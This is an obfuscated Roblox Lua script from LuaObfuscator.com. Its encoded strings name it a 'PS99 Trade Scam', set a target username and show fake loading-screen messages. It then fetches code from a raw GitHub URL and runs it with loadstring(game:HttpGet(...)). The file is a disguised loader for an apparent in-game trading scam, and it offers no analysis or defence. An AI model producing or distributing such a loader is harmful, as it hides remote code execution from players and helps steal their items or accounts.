--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v31)if (v1(v31,2)==79) then v20=v0(v3(v31,1,1));return "";else local v69=v2(v0(v31,16));if v20 then local v77=0;local v78;while true do if (0==v77) then v78=v5(v69,v20);v20=nil;v77=1;end if (v77==1) then return v78;end end else return v69;end end end);v21=nil;v18=1;end if (v18==2) then function v23()local v32=0;local v33;local v34;while true do if (v32==1) then return (v34 * (800 -544)) + v33 ;end if (v32==(0 -0)) then v33,v34=v1(v16,v19,v19 + ((880 -(282 + 595)) -1) );v19=v19 + (4 -2) ;v32=620 -(555 + 64) ;end end end v24=nil;function v24()local v35=(2594 -(892 + 65)) -((3633 -2110) + 114) ;local v36;local v37;local v38;local v39;while true do if (v35==(1 + 0)) then return (v39 * (23917454 -7140238)) + (v38 * (66601 -(68 + (1842 -845)))) + (v37 * (1526 -(226 + 1044))) + v36 ;end if (v35==((0 -0) -0)) then v36,v37,v38,v39=v1(v16,v19,v19 + (120 -(32 + 85)) );v19=v19 + 4 + 0 ;v35=1 + 0 ;end end end v25=nil;v18=3;end if (v18==5) then v30=nil;function v30(v40,v41,v42)local v43=0;local v44;local v45;local v46;while true do if (v43==0) then v44=v40[1];v45=v40[2];v43=1;end if (v43==1) then v46=v40[3];return function(...)local v79=v44;local v80=v45;local v81=v46;local v82=v28;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v97=0,v87 do if (v97>=v81) then v85[v97-v81 ]=v86[v97 + 1 ];else v89[v97]=v86[v97 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v98=0;while true do if (0==v98) then v91=v79[v83];v92=v91[1];v98=1;end if (v98==1) then if (v92<=9) then if (v92<=4) then if (v92<=1) then if (v92==0) then local v124=v91[2];v89[v124]=v89[v124](v13(v89,v124 + 1 ,v84));else v89[v91[2]][v91[3]]=v91[4];end elseif (v92<=2) then if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v42;else v89[v91[2]]=v42[v91[3]];end elseif (v92>3) then local v145=0;local v146;local v147;while true do if (v145==1) then v89[v146 + 1 ]=v147;v89[v146]=v147[v91[4]];break;end if (v145==0) then v146=v91[2];v147=v89[v91[3]];v145=1;end end else v89[v91[2]][v91[3]]=v91[4];end elseif (v92<=6) then if (v92>5) then v42[v91[3]]=v89[v91[2]];else v89[v91[2]]=v91[3];end elseif (v92<=7) then local v132=v91[2];local v133=v89[v91[3]];v89[v132 + 1 ]=v133;v89[v132]=v133[v91[4]];elseif (v92==8) then v89[v91[2]]=v91[3];else local v152=v91[2];local v153,v154=v82(v89[v152](v13(v89,v152 + 1 ,v91[3])));v84=(v154 + v152) -1 ;local v155=0;for v166=v152,v84 do local v167=0;while true do if (v167==0) then v155=v155 + 1 ;v89[v166]=v153[v155];break;end end end end elseif (v92<=14) then if (v92<=11) then if (v92==10) then v89[v91[2]]();else do return;end end elseif (v92<=12) then local v137=v91[2];v89[v137]=v89[v137](v13(v89,v137 + 1 ,v84));elseif (v92>13) then v89[v91[2]]=v91[3]~=0 ;else local v157=0;local v158;local v159;local v160;local v161;while true do if (v157==0) then v158=v91[2];v159,v160=v82(v89[v158](v13(v89,v158 + 1 ,v91[3])));v157=1;end if (v157==1) then v84=(v160 + v158) -1 ;v161=0;v157=2;end if (v157==2) then for v186=v158,v84 do local v187=0;while true do if (v187==0) then v161=v161 + 1 ;v89[v186]=v159[v161];break;end end end break;end end end elseif (v92<=16) then if (v92>15) then if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v42;else v89[v91[2]]=v42[v91[3]];end else v42[v91[3]]=v89[v91[2]];end elseif (v92<=17) then v89[v91[2]]();elseif (v92>18) then v89[v91[2]]=v91[3]~=0 ;else do return;end end v83=v83 + 1 ;break;end end end end;end end end return v30(v29(),{},v17)(...);end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v47=0 + 0 ;local v48;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v47~=(438 -(262 + 176))) then else v48=0;v49=nil;v47=1722 -(345 + 1376) ;end if ((690 -(198 + 490))==v47) then v52=nil;v53=nil;v47=3;end if (v47==(13 -10)) then v54=nil;while true do local v93=0;while true do if (v93~=0) then else if (v48==2) then for v110=2 -1 ,v53 do local v111=0;local v112;local v113;local v114;local v115;while true do if (v111==1) then v114=nil;v115=nil;v111=1208 -(696 + 510) ;end if (v111==(3 -1)) then while true do if (v112==(1263 -(1091 + 171))) then v115=nil;while true do if ((1 + 0)==v113) then if (v114==(3 -2)) then v115=v22()~=(0 -0) ;elseif (v114==(376 -(123 + 251))) then v115=v25();elseif (v114==3) then v115=v26();end v54[v110]=v115;break;end if (v113~=(0 -0)) then else local v169=0;local v170;local v171;while true do if (v169==1) then while true do if (v170==0) then v171=0;while true do if (v171==1) then v113=699 -(208 + 490) ;break;end if (v171~=0) then else local v193=0;while true do if (v193==1) then v171=1 + 0 ;break;end if (v193==(0 + 0)) then local v202=0;while true do if (v202~=0) then else v114=v22();v115=nil;v202=837 -(660 + 176) ;end if (v202~=(1 + 0)) then else v193=203 -(14 + 188) ;break;end end end end end end break;end end break;end if (v169==0) then v170=675 -(534 + 141) ;v171=nil;v169=1;end end end end break;end if ((0 + 0)~=v112) then else local v141=0;while true do if (v141==(1 + 0)) then v112=1;break;end if (v141==(0 + 0)) then v113=0 -0 ;v114=nil;v141=1;end end end end break;end if (v111==0) then v112=0 -0 ;v113=nil;v111=2 -1 ;end end end v52[3]=v22();for v116=1,v24() do local v117=0;local v118;local v119;local v120;while true do if (v117==0) then v118=0 + 0 ;v119=nil;v117=1;end if ((1 + 0)~=v117) then else v120=nil;while true do if (v118~=(396 -(115 + 281))) then else v119=0;v120=nil;v118=2 -1 ;end if (v118~=1) then else while true do if (v119==0) then v120=v22();if (v21(v120,1,1)==(0 + 0)) then local v178=0;local v179;local v180;local v181;local v182;local v183;while true do if (v178==(4 -2)) then v183=nil;while true do if (v179~=(3 -2)) then else local v190=867 -(550 + 317) ;while true do if (v190~=(0 -0)) then else v182=nil;v183=nil;v190=1;end if (v190~=1) then else v179=2 -0 ;break;end end end if (v179==(5 -3)) then while true do if (v180==1) then local v194=0;local v195;local v196;while true do if (v194==(285 -(134 + 151))) then v195=0;v196=nil;v194=1666 -(970 + 695) ;end if (v194==1) then while true do if (v195==0) then v196=0;while true do if (v196~=1) then else v180=2;break;end if (v196==0) then v183={v23(),v23(),nil,nil};if (v181==(0 -0)) then local v209=0;local v210;while true do if ((0 -0)~=v209) then else v210=0 -0 ;while true do if (v210~=0) then else v183[3]=v23();v183[4]=v23();break;end end break;end end elseif (v181==1) then v183[3]=v24();elseif (v181==(1826 -(1195 + 629))) then v183[3 -0 ]=v24() -((243 -(187 + 54))^16) ;elseif (v181==3) then local v219=0;while true do if (v219==(780 -(162 + 618))) then v183[3]=v24() -(2^(12 + 4)) ;v183[4]=v23();break;end end end v196=1 + 0 ;end end break;end end break;end end end if (v180==(3 -1)) then local v197=0;local v198;while true do if (0==v197) then v198=0;while true do if (v198==1) then v180=4 -1 ;break;end if ((0 + 0)~=v198) then else local v206=1636 -(1373 + 263) ;while true do if (v206==0) then local v208=0;while true do if (v208==(1000 -(451 + 549))) then if (v21(v182,1,1 + 0 )~=1) then else v183[2]=v54[v183[2]];end if (v21(v182,2 -0 ,2)==(1 -0)) then v183[1387 -(746 + 638) ]=v54[v183[2 + 1 ]];end v208=1 -0 ;end if (v208~=1) then else v206=342 -(218 + 123) ;break;end end end if (v206==1) then v198=1;break;end end end end break;end end end if (3~=v180) then else if (v21(v182,1584 -(1535 + 46) ,3)~=(1 + 0)) then else v183[1 + 3 ]=v54[v183[564 -(306 + 254) ]];end v49[v116]=v183;break;end if (v180==0) then local v200=0 + 0 ;local v201;while true do if (v200==(0 -0)) then v201=0;while true do if (v201==(1467 -(899 + 568))) then local v207=0;while true do if (v207==(0 + 0)) then v181=v21(v120,2,7 -4 );v182=v21(v120,607 -(268 + 335) ,296 -(60 + 230) );v207=573 -(426 + 146) ;end if ((1 + 0)~=v207) then else v201=1457 -(282 + 1174) ;break;end end end if (v201==1) then v180=812 -(569 + 242) ;break;end end break;end end end end break;end if (v179~=(0 -0)) then else local v191=0;local v192;while true do if (v191~=0) then else v192=0;while true do if (v192==0) then local v205=0 + 0 ;while true do if (1==v205) then v192=1;break;end if (v205~=0) then else v180=1024 -(706 + 318) ;v181=nil;v205=1;end end end if (v192~=1) then else v179=1252 -(721 + 530) ;break;end end break;end end end end break;end if (v178==1) then v181=nil;v182=nil;v178=2;end if (v178~=(1271 -(945 + 326))) then else v179=0;v180=nil;v178=2 -1 ;end end end break;end end break;end end break;end end end v48=3;end if (v48~=(0 + 0)) then else local v107=0;local v108;while true do if ((700 -(271 + 429))==v107) then v108=0 + 0 ;while true do if (v108==1) then v51={};v48=1;break;end if (v108==0) then local v123=0;while true do if (v123~=(1501 -(1408 + 92))) then else v108=1087 -(461 + 625) ;break;end if (v123==(1288 -(993 + 295))) then v49={};v50={};v123=1;end end end end break;end end end v93=1;end if (v93~=(1 + 0)) then else if (v48~=1) then else v52={v49,v50,nil,v51};v53=v24();v54={};v48=1 + 1 ;end if (v48~=(532 -(406 + 123))) then else local v109=0;while true do if (v109~=(1769 -(1749 + 20))) then else for v121=1,v24() do v50[v121-1 ]=v29();end return v52;end end end break;end end end break;end if (v47==(1 + 0)) then v50=nil;v51=nil;v47=1324 -(1249 + 73) ;end end end v18=5;end if (1==v18) then function v21(v55,v56,v57)if v57 then local v70=0 + 0 ;local v71;while true do if (v70==(0 -(0 -0))) then v71=(v55/(((384 -268) -(4 + 110))^(v56-(585 -(47 + 10 + 527)))))%((1147 -(466 + 679))^(((v57-((207 + 1221) -(41 + 1386))) -(v56-(2 -1))) + 1 + 0)) ;return v71-(v71%(2 -1)) ;end end else local v72=(3849 -1949) -(106 + 1794) ;local v73;while true do if ((0 + 0)==v72) then v73=2^(v56-(1 + 0)) ;return (((v55%(v73 + v73))>=v73) and (2 -1)) or (166 -(122 + 44)) ;end end end end v22=nil;function v22()local v58=v1(v16,v19,v19);v19=v19 + 1 ;return v58;end v23=nil;v18=2;end if (v18==3) then function v25()local v59=v24();local v60=v24();local v61=1;local v62=(v21(v60,1 + 0 ,20) * ((67 -(30 + 13 + 22))^(22 + 10))) + v59 ;local v63=v21(v60,1278 -(1043 + 214) ,(855 -(542 + 196)) -86 );local v64=((v21(v60,32)==(1213 -(323 + (2342 -1453)))) and  -(2 -1)) or 1 ;if (v63==(580 -(361 + (561 -342)))) then if (v62==(320 -((1604 -(1126 + 425)) + 267))) then return v64 * (0 + 0) ;else local v94=413 -(15 + 398) ;while true do if ((982 -(18 + 964))==v94) then v63=3 -2 ;v61=0 + 0 ;break;end end end elseif (v63==(1290 + (1622 -865))) then return ((v62==0) and (v64 * (1/(850 -(20 + 830))))) or (v64 * NaN) ;end return v8(v64,v63-(799 + 224) ) * (v61 + (v62/((128 -(34 + 82 + 10))^(4 + 48)))) ;end v26=nil;function v26(v65)local v66=0;local v67;local v68;while true do if (v66==(406 -(118 + 287))) then v67=v3(v16,v19,(v19 + v65) -(3 -(2 + 0)) );v19=v19 + v65 ;v66=1123 -(118 + 1003) ;end if (v66==2) then v68={};for v95=2 -(1 + 0) , #v67 do v68[v95]=v2(v1(v3(v67,v95,v95)));end v66=(222 + 158) -(142 + 235) ;end if (v66==(0 -0)) then v67=nil;if  not v65 then local v99=0 + 0 + 0 ;while true do if (v99==(977 -(553 + 424))) then v65=v24();if (v65==0) then return "";end break;end end end v66=1;end if (v66==(5 -(2 + 0))) then return v6(v68);end end end v27=v24;v18=4;end end end v15("LOL!123O0003083O00557365726E616D6503093O004F646B64626662666A030D3O006C6F6164696E677363722O656E03023O005F4703103O00437573746F6D5363726970744E616D65030F3O0050532O39205472616465205363616D03053O00546578743103103O00536372697074204C6F616465643O2E03053O00546578743203123O0057616974696E6720666F722053637269707403053O00546578743303133O00436865636B696E6720536372697074733O2E03053O00546578743403133O005374617274696E6720536372697074733O2E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403493O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A757374616E6F74686572646D652F70657473696D782O322F6D61696E2F70657473392E6C756100163O0012083O00023O0012063O00014O000E3O00013O0012063O00033O0012023O00043O0030013O000500060012023O00043O0030013O000700080012023O00043O0030013O0009000A0012023O00043O0030013O000B000C0012023O00043O0030013O000D000E0012023O000F3O001202000100103O002004000100010011001208000300124O0009000100034O000C5O00022O00113O000100012O000B3O00017O00",v9(),...);
